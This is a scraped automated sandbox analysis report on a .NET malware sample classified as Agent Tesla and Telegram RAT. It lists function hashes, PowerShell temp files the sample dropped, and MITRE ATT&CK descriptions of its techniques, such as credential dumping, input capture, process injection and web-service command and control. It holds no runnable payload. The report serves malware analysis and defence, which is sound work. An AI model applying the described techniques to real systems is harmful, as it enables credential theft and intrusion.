Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1822088931.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7050000_eFzAvsOm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8747a8303be273356413eda04681e89f76ba4db17c75c9e59707156b438591c2
Instruction ID: cf0e9fc0e22369581ff69fd4a96c0133831d127b25d232320b6c93abb8e3d309
Opcode Fuzzy Hash: 8747a8303be273356413eda04681e89f76ba4db17c75c9e59707156b438591c2
Instruction Fuzzy Hash: AFC08CB004160487C21027A9FD0E3243BEC9B01312F424310B60D944309B6D0060CA91

Function 07007447 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1821740637.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7000000_eFzAvsOm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dccf5e8039278204d38739b88340913b71f25ef9d47ed94dad9e19a791ca536c
Instruction ID: 4ba3a14d85be071ab19ddd02bb3d0bf3be6f025078de456d3ae6e22bb037112f
Opcode Fuzzy Hash: dccf5e8039278204d38739b88340913b71f25ef9d47ed94dad9e19a791ca536c
Instruction Fuzzy Hash: 5EC01234100008AFCB40CF24D085CE8BB72EF58320B1080A1F8888B322C232D812CF00

Function 07007448 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1821740637.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7000000_eFzAvsOm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d6f2623337c38ef8749255ff78b3cbedb78fba73e040c9434c39499d8169e63
Instruction ID: 61412fa5721fa0801f19765b42d0f6ac58f054d2697597a3f249e516f761f0d5
Opcode Fuzzy Hash: 1d6f2623337c38ef8749255ff78b3cbedb78fba73e040c9434c39499d8169e63
Instruction Fuzzy Hash: 87C00235140108AFC740DF55D445D95BBA9EB59660B1180A1F9484B722C632E9119A90

Function 0705565C Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1822088931.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7050000_eFzAvsOm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2401a0813b38d875b31c4f88504245a0a101242821057f87b28ad57bf2b7b37d
Instruction ID: 72b4c0bd2a0ff711db74848d459d57477ba3dba340be20db274a94538bc30245
Opcode Fuzzy Hash: 2401a0813b38d875b31c4f88504245a0a101242821057f87b28ad57bf2b7b37d
Instruction Fuzzy Hash: B8B012F61F6309E59404A364C888BAF5860FBB6F91F809D03368E4004089724824D26B

Non-executed Functions

Function 057C44C0 Relevance: 12.7, Strings: 10, Instructions: 181COMMON

Download Yara Rule

Strings

4'dq, xrefs: 057C4709
4'dq, xrefs: 057C472C
4'dq, xrefs: 057C465A
4'dq, xrefs: 057C46A0
4'dq, xrefs: 057C46E6
4'dq, xrefs: 057C467D
4'dq, xrefs: 057C4637
4'dq, xrefs: 057C4614
4'dq, xrefs: 057C45F1
4'dq, xrefs: 057C46C3

Memory Dump Source

Source File: 0000000A.00000002.1821457375.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_57c0000_eFzAvsOm.jbxd

Similarity

API ID:
String ID: 4'dq$4'dq$4'dq$4'dq$4'dq$4'dq$4'dq$4'dq$4'dq$4'dq
API String ID: 0-1020298166
Opcode ID: d30a73980a0cc826f535dfc52a9d02dc0c74e937c43b27738365e49a0ead241e
Instruction ID: 268dbab4ef59b7896e4293f5f0b3405322940e5a5784a5ed88258484a27bfccc
Opcode Fuzzy Hash: d30a73980a0cc826f535dfc52a9d02dc0c74e937c43b27738365e49a0ead241e
Instruction Fuzzy Hash: E7716031D0031A8FCB04EFA5E8516DEBBB2FF95304F618A59D4057F265EB706A95CB80

Function 057C44D0 Relevance: 12.7, Strings: 10, Instructions: 172COMMON

Download Yara Rule

Strings

4'dq, xrefs: 057C4709
4'dq, xrefs: 057C472C
4'dq, xrefs: 057C465A
4'dq, xrefs: 057C46A0
4'dq, xrefs: 057C46E6
4'dq, xrefs: 057C467D
4'dq, xrefs: 057C4637
4'dq, xrefs: 057C4614
4'dq, xrefs: 057C45F1
4'dq, xrefs: 057C46C3

Memory Dump Source

Source File: 0000000A.00000002.1821457375.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_57c0000_eFzAvsOm.jbxd

Similarity

API ID:
String ID: 4'dq$4'dq$4'dq$4'dq$4'dq$4'dq$4'dq$4'dq$4'dq$4'dq
API String ID: 0-1020298166
Opcode ID: 4d1690593b2a887d72d430b21ab4c50f45aa929f06b1e2b2d7cc30a410a2325b
Instruction ID: b02c523054837068ab3a7b532178c592f3a7fb264412af5e6471a9d310a43a84
Opcode Fuzzy Hash: 4d1690593b2a887d72d430b21ab4c50f45aa929f06b1e2b2d7cc30a410a2325b
Instruction Fuzzy Hash: 5D714F31E0031A8FCB04EFA5D8516DEBBB2FF95304F618A19D0157F269EB706A95CB80

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: Agenttesla

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\eFzAvsOm.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2af2zu5v.rvd.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4f4wribb.41j.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5a2o4mph.ei2.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c1mcczme.v4h.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d00n0thz.x2s.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gtrmytf2.11h.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ip453cia.zu4.psm1

Windows Analysis Report
SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre